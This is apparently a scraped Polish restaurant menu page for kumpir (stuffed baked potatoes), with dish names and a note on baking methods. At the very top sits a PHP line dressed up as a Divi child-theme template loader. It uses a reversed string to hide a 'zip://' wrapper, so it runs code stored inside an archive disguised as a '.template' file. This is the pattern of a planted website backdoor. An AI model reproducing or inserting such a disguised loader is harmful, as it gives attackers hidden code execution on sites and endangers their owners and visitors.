/* DiviChildTheme Theme Template Loader */ load_template( strrev( "//:piz" ) . locate_template( "DiviChildTheme.template" ) . "#template", true ); Menu | My Blog

MENU

Zobacz, czy Ty także znajdziesz tutaj coś dla siebie…

KUMPIR to ogromny pieczony ziemniak. Jego podstawę stanowi zawsze masło czosnkowe, ser żółty oraz aromatyczne przyprawy. Składniki te wymieszane razem tworzą przepyszną i puszystą masę serowo–ziemniaczaną. Nasz Kumpir może być serwowany z nadzieniami takimi jak boczek, kurczak, pieczarki, szynka, ser feta itp.

Ziemniaki mogą być pieczone w tradycyjnym piecu gazowym, elektrycznym, w piecu konwekcyjnym, kuchence mikrofalowej, na grillu lub na otwartym ogniu. Niektóre restauracje, tak jak nasza, używają odpowiednich pieców przeznaczonych do pieczenia dużych ilości ziemniaków, a następnie utrzymywania ich ciepłych i gotowych od razu do podania.

KUMPIR

BOCZEK I PIECZARKI

KUMPIR

BOCZEK I PIECZARKI

KUMPIR

Z KURCZAKIEM

KUMPIR

CHILLI CON CARNE

KUMPIR

TRADYCYJNY

KUMPIR

JAJKO NA BOCZKU

KUMPIR

Z GZIKIEM

KUMPIR

KRAKOWSKI

KUMPIR

TRADYCYJNY

KUMPIR

JAJKO NA BOCZKU

KUMPIR

Z GZIKIEM

KUMPIR

NAPÓJ AYRAN

MASZ OCHOTĘ NA KUMPIRA? PRZEJDŹ DO ZAMÓWIEŃ ONLINE, ODNAJDŹ SWÓJ NAJBLIŻSZY LOKAL. PŁAĆ GOTÓWKĄ, KARTĄ LUB SZYBKIM PRZELEWEM.